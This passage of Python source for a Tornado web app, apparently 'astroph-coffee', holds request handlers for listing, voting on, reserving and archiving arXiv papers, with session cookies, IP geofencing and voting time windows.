the message to protect against tampering.
'''
try:
msg = message.replace('*','=')
decoded_message = base64.b64decode(msg)
decoded_message = signer.unsign(decoded_message)
return xhtml_unescape(decoded_message)
except Exception as e:
return ''
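# Round-trip sketch (illustration only): both helpers expect an
# itsdangerous.Signer built from the server's secret, e.g.
#
#     from itsdangerous import Signer
#     signer = Signer('not-the-real-secret')
#     token = msgencode('Papers imported OK', signer)
#     assert msgdecode(token, signer) == 'Papers imported OK'
#
# A tampered token fails the unsign() check, so msgdecode() returns ''.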
def group_arxiv_dates(dates, npapers, nlocal, nvoted):
'''
This takes a list of datetime.dates and the number of papers corresponding
to each date and builds a nice dict out of it, allowing the following
listing (in rev-chron order) to be made:
YEAR X
Month X:
Date X --- <strong>YY<strong> papers
.
.
.
YEAR 1
Month 1:
Date 1 --- <strong>YY<strong> papers
'''
years, months = [], []
for x in dates:
years.append(x.year)
months.append(x.month)
unique_years = set(years)
unique_months = set(months)
yeardict = {}
for year in unique_years:
yeardict[year] = {}
for month in unique_months:
yeardict[year][MONTH_NAMES[month]] = [
(x,y,z,w) for (x,y,z,w) in zip(dates, npapers, nlocal, nvoted)
if (x.year == year and x.month == month)
]
for month in yeardict[year].copy():
if not yeardict[year][month]:
del yeardict[year][month]
return yeardict
##################
## URL HANDLERS ##
##################
class CoffeeHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee and redirects based on
time of day.
'''
def initialize(self,
database,
voting_start,
voting_end,
coffee_time,
server_tz,
signer,
room,
building,
department,
institution):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.coffee_time = coffee_time
self.local_tz = timezone(server_tz)
self.signer = signer
self.room = room
self.building = building
self.department = department
self.institution = institution
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
' <a class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# there's no existing user session
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# construct the current dt and use it to figure out the local-to-server
# voting times
dtnow = datetime.now(tz=utc)
dtstart = dtnow.replace(hour=self.voting_start.hour,
minute=self.voting_start.minute,
second=0)
local_start = dtstart.astimezone(self.local_tz)
local_start = local_start.strftime('%H:%M %Z')
dtend = dtnow.replace(hour=self.voting_end.hour,
minute=self.voting_end.minute,
second=0)
local_end = dtend.astimezone(self.local_tz)
local_end = local_end.strftime('%H:%M %Z')
dtcoffee = dtnow.replace(hour=self.coffee_time.hour,
minute=self.coffee_time.minute,
second=0)
local_coffee = dtcoffee.astimezone(self.local_tz)
local_coffee = local_coffee.strftime('%H:%M %Z')
utc_start = self.voting_start.strftime('%H:%M %Z')
utc_end = self.voting_end.strftime('%H:%M %Z')
utc_coffee = self.coffee_time.strftime('%H:%M %Z')
self.render("index.html",
user_name=user_name,
local_today=local_today,
voting_localstart=local_start,
voting_localend=local_end,
voting_start=utc_start,
voting_end=utc_end,
coffeetime_local=local_coffee,
coffeetime_utc=utc_coffee,
flash_message=flash_message,
new_user=new_user,
coffee_room=self.room,
coffee_building=self.building,
coffee_department=self.department,
coffee_institution=self.institution)
class ArticleListHandler(tornado.web.RequestHandler):
'''This handles all requests for the listing of selected articles and voting
pages. Note: if nobody voted on anything, the default is to return all
articles with local authors at the top.
'''
def initialize(self, database,
voting_start,
voting_end,
server_tz,
reserve_interval,
signer):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.server_tz = server_tz
self.signer = signer
self.reserve_interval = reserve_interval
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
todays_date = datetime.now(tz=utc).strftime('%A, %b %d %Y')
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
todays_localdate = (
datetime.now(tz=timezone(self.server_tz)).strftime('%Y-%m-%d')
)
todays_utcdow = datetime.now(tz=utc).weekday()
todays_localdate_str = (
datetime.now(tz=timezone(self.server_tz)).strftime('%A, %b %d %Y')
)
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# there's no existing user session
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
############################
## SERVE THE PAGE REQUEST ##
############################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then show the voting page
if (self.voting_start < timenow < self.voting_end):
# get the articles for today
(local_articles, voted_articles,
other_articles, reserved_articles) = (
arxivdb.get_articles_for_voting(database=self.database)
)
# if today's papers aren't ready yet, redirect to the papers display
if not local_articles and not voted_articles and not other_articles:
LOGGER.warning('no papers for today yet, '
'redirecting to previous day papers')
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(
database=self.database
)
)
todays_date = datetime.strptime(
latestdate,
'%Y-%m-%d'
).strftime('%A, %b %d %Y')
# don't show a message on the weekend when no papers are loaded
if todays_utcdow in (5,6):
flash_message = ""
else:
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"Papers for today haven't been imported yet. "
"Here are the most recent papers. "
"Please wait a few minutes and try again."
"<a href=\"#\" class=\"close\">×</a></div>"
)
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("listing.html",
user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
flash_message=flash_message,
reserve_interval_days=self.reserve_interval,
new_user=new_user)
# if today's papers are ready, show them and ask for votes
else:
# get this user's votes
user_articles = arxivdb.get_user_votes(todays_utcdate,
user_name,
database=self.database)
user_reserved = arxivdb.get_user_reservations(
todays_utcdate,
user_name,
database=self.database
)
LOGGER.info('user has votes on: %s, has reservations on: %s'
% (user_articles, user_reserved))
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the voting page
self.render("voting.html",
user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
flash_message=flash_message,
new_user=new_user,
reserve_interval_days=self.reserve_interval,
user_articles=user_articles,
user_reserved=user_reserved)
# otherwise, show the article list
else:
# get the articles for today
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(utcdate=todays_utcdate,
database=self.database)
)
# if today's papers aren't ready yet, show latest papers
if not local_articles and not voted_articles and not other_articles:
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(
database=self.database
)
)
todays_date = datetime.strptime(
latestdate,
'%Y-%m-%d'
).strftime('%A, %b %d %Y')
# don't show a message on the weekend when no papers are loaded
if todays_utcdow in (5,6):
flash_message = ""
else:
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"Papers for today haven't been imported yet. "
"Here are the most recent papers. "
"Please wait a few minutes and try again."
"<a href=\"#\" class=\"close\">×</a></div>"
)
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("listing.html",
user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
reserve_interval_days=self.reserve_interval,
flash_message=flash_message,
new_user=new_user)
class ReservationHandler(tornado.web.RequestHandler):
'''
This handles all requests for the voting page.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''
This handles a POST request for a paper reservation.
'''
arxivid = self.get_argument('arxivid', None)
reservetype = self.get_argument('reservetype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# if we're asked to geofence, then do so
# (unless the request came from INSIDE the building)
# FIXME: add exceptions for private network IPv4 addresses
geolocked = False
# check the network as well
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.ipaddrs])
except:
trustedip = False
if self.geofence and user_ip != '127.0.0.1':
try:
geoip = self.geofence.city(user_ip)
if (geoip.country.iso_code in self.countries and
geoip.subdivisions.most_specific.iso_code
in self.regions):
LOGGER.info('geofencing ok: '
'reservation request '
'from inside allowed regions')
else:
LOGGER.warning(
'geofencing activated: '
                    'reservation request from %s '
'is outside allowed regions' %
('%s-%s' % (
geoip.country.iso_code,
geoip.subdivisions.most_specific.iso_code
))
)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# fail deadly
except Exception as e:
LOGGER.exception('geofencing failed for IP %s, '
'blocking request.' % user_ip)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
#############################
## PROCESS THE RESERVATION ##
#############################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# if all things are satisfied, then process the reserve request
if (arxivid and
reservetype and
sessioninfo[0] and
((not geolocked) or trustedip) and
in_votetime):
arxivid = xhtml_escape(arxivid)
reservetype = xhtml_escape(reservetype)
LOGGER.info('user: %s, reserving: %s, on: %s' % (user_name,
reservetype,
arxivid))
if 'arXiv:' not in arxivid or reservetype not in ('reserve',
'release'):
message = ("Your paper reservation request "
"used invalid arguments "
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# first, check how many reservations this user has
user_reservations = arxivdb.get_user_reservations(
todays_utcdate,
user_name,
database=self.database
)
# make sure it's less than 5 or we're not adding another
# reservation
if len(user_reservations) < 5 or reservetype != 'reserve':
reserve_outcome = arxivdb.record_reservation(
arxivid,
user_name,
reservetype,
database=self.database
)
                    if reserve_outcome is False or reserve_outcome is None:
message = ("That article doesn't exist, "
"and your reservation "
"has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
if (reserve_outcome[0] == 1 and
reserve_outcome[1] == user_name):
message = ("Reservation successfully recorded for %s"
% arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
elif (reserve_outcome[0] == 1 and
reserve_outcome[1] != user_name):
message = ("Someeone else already reserved that paper!")
jsondict = {'status':'failed',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
elif (reserve_outcome[0] == 0):
message = ("Release successfully recorded for %s"
% arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'reserved':reserve_outcome[0]}}
else:
message = ("That article doesn't exist, "
"or your reservation "
"has been discarded because of a problem.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("You've reserved 5 articles already.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
elif ((not geolocked) or trustedip):
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class VotingHandler(tornado.web.RequestHandler):
'''
This handles all requests for the voting page.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''This handles POST requests for vote submissions.
takes the following arguments:
arxivid: article to vote for
votetype: up / down
checks if an existing session is in play. if not, flashes a message
saying 'no dice' in a flash message
- checks if the user has more than five votes used for the utcdate of
the requested arxivid
- if they do, then deny vote
- if they don't, allow vote
if vote is allowed:
- changes the nvote column for arxivid
- adds the current user to the voters column
- returns the nvotes for the arxivid along with
success/failure
if vote is not allowed:
- sends back a 401 + error message, which the frontend JS turns into a
flash message
the frontend JS then:
- updates the vote total for this arxivid
- handles flash messages
- updates the vote button status
'''
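        # Response shape used throughout this handler (what the frontend JS
        # expects):
        #   success: {"status": "success", "message": ..., "results": {"nvotes": N}}
        #   failure: {"status": "failed", "message": ..., "results": None}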
arxivid = self.get_argument('arxivid', None)
votetype = self.get_argument('votetype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# TESTING
# user_ip = '131.111.184.18' # Cambridge UK
# user_ip = '71.168.183.215' # FIOS NJ
# user_ip = '70.192.88.245' # VZW NJ
# user_ip = '70.42.157.5' # VZW NY
# user_ip = '69.141.255.240' # Comcast PA
# user_ip = '128.112.25.36' # Princeton Univ, NJ
# if we're asked to geofence, then do so
# (unless the request came from INSIDE the building)
# FIXME: add exceptions for private network IPv4 addresses
geolocked = False
# check the network as well
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.ipaddrs])
except:
trustedip = False
if self.geofence and user_ip != '127.0.0.1':
try:
# check the geoip location
geoip = self.geofence.city(user_ip)
if (geoip.country.iso_code in self.countries and
geoip.subdivisions.most_specific.iso_code
in self.regions):
LOGGER.info('geofencing ok: '
'vote request from inside allowed regions')
else:
LOGGER.warning(
'geofencing activated: '
'vote request from %s '
'is outside allowed regions' %
('%s-%s' % (
geoip.country.iso_code,
geoip.subdivisions.most_specific.iso_code
))
)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# fail deadly
except Exception as e:
LOGGER.exception('geofencing failed for IP %s, '
'blocking request.' % user_ip)
message = ("Sorry, you're trying to vote "
"from an IP address that is "
"blocked from voting.")
jsondict = {'status':'failed',
'message':message,
'results':None}
geolocked = True
self.write(jsondict)
self.finish()
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# if all things are satisfied, then process the vote request
if (arxivid and
votetype and
sessioninfo[0] and
(not geolocked or trustedip) and
in_votetime):
arxivid = xhtml_escape(arxivid)
votetype = xhtml_escape(votetype)
LOGGER.info('user: %s, voting: %s, on: %s' % (user_name,
votetype,
arxivid))
if 'arXiv:' not in arxivid or votetype not in ('up','down'):
message = ("Your vote request used invalid arguments"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# first, check how many votes this user has
user_votes = arxivdb.get_user_votes(todays_utcdate,
user_name,
database=self.database)
# make sure it's less than 5 or the votetype isn't up
if len(user_votes) < 5 or votetype != 'up':
vote_outcome = arxivdb.record_vote(arxivid,
user_name,
votetype,
database=self.database)
if vote_outcome is False:
message = ("That article doesn't exist, and your vote "
"has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Vote successfully recorded for %s" % arxivid)
jsondict = {'status':'success',
'message':message,
'results':{'nvotes':vote_outcome}}
self.write(jsondict)
self.finish()
else:
message = ("You've voted on 5 articles already.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
elif (not geolocked or trustedip):
message = ("Your vote request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
message = ("Your reservation request could not be authorized"
" and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class EditHandler(tornado.web.RequestHandler):
'''This handles all requests for the editing function.
This allows users in the trustedip range to edit the arxiv listing for the
current day.
The allowable edits are:
- paper is local author
- paper is not local author
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def post(self):
'''
This handles a POST request for a paper reservation.
'''
arxivid = self.get_argument('arxivid', None)
edittype = self.get_argument('edittype', None)
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
sessioninfo = webdb.session_check(session_token,
database=self.database)
user_name = sessioninfo[2]
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
user_ip = self.request.remote_ip
# check the network
try:
userip_addrobj = ipaddress.ip_address(user_ip.decode())
trustedip = any([(userip_addrobj in x) for x in self.editips])
        except Exception:
            trustedip = False
######################
## PROCESS THE EDIT ##
######################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then allow the voting POST request
if (self.voting_start < timenow < self.voting_end):
in_votetime = True
else:
in_votetime = False
# editing only checks its cidr and if we're in vote mode
if (arxivid and edittype and sessioninfo[0] and
trustedip and in_votetime):
arxivid = xhtml_escape(arxivid)
edittype = xhtml_escape(edittype)
            LOGGER.info('user: %s, editing: %s, on: %s' % (user_name,
                                                           edittype,
                                                           arxivid))
            if 'arXiv:' not in arxivid or edittype not in ('local',
                                                           'notlocal'):
message = ("Your paper reservation request "
"used invalid arguments "
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
else:
# process the edit
pass
# if we're not allowed to edit, discard the request
else:
message = ("Your edit request could not be authorized "
"(probably because the voting window is over)"
"and has been discarded.")
jsondict = {'status':'failed',
'message':message,
'results':None}
self.write(jsondict)
self.finish()
class AboutHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee/about.
'''
def initialize(self, database):
'''
This sets up the database.
'''
self.database = database
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
        #######################
        # show the about page #
        #######################
self.render("about.html",
local_today=local_today,
user_name=user_name,
flash_message=flash_message,
new_user=new_user)
class ArchiveHandler(tornado.web.RequestHandler):
'''
This handles all paper archive requests.
url: /astroph-coffee/archive/YYYYMMDD
'''
def initialize(self,
database,
reserve_interval,
signer):
'''
Sets up the database.
'''
self.database = database
self.reserve_interval = reserve_interval
self.signer = signer
def get(self, archivedate):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
##################################
# now handle the archive request #
##################################
if archivedate is not None:
archivedate = xhtml_escape(archivedate)
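            # ARCHIVEDATE_REGEX is expected to capture (year, month, day) from
            # a YYYYMMDD path fragment; if it doesn't match, we fall through to
            # the archive index below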
archivedate = re.match(ARCHIVEDATE_REGEX, archivedate)
if archivedate:
year, month, day = archivedate.groups()
listingdate = '%s-%s-%s' % (year, month, day)
# get the articles for today
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(utcdate=listingdate,
database=self.database)
)
# if this date's papers aren't available, show the archive index
if (not local_articles and
not voted_articles and
not other_articles and
not reserved_articles):
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"No papers for %s were found. "
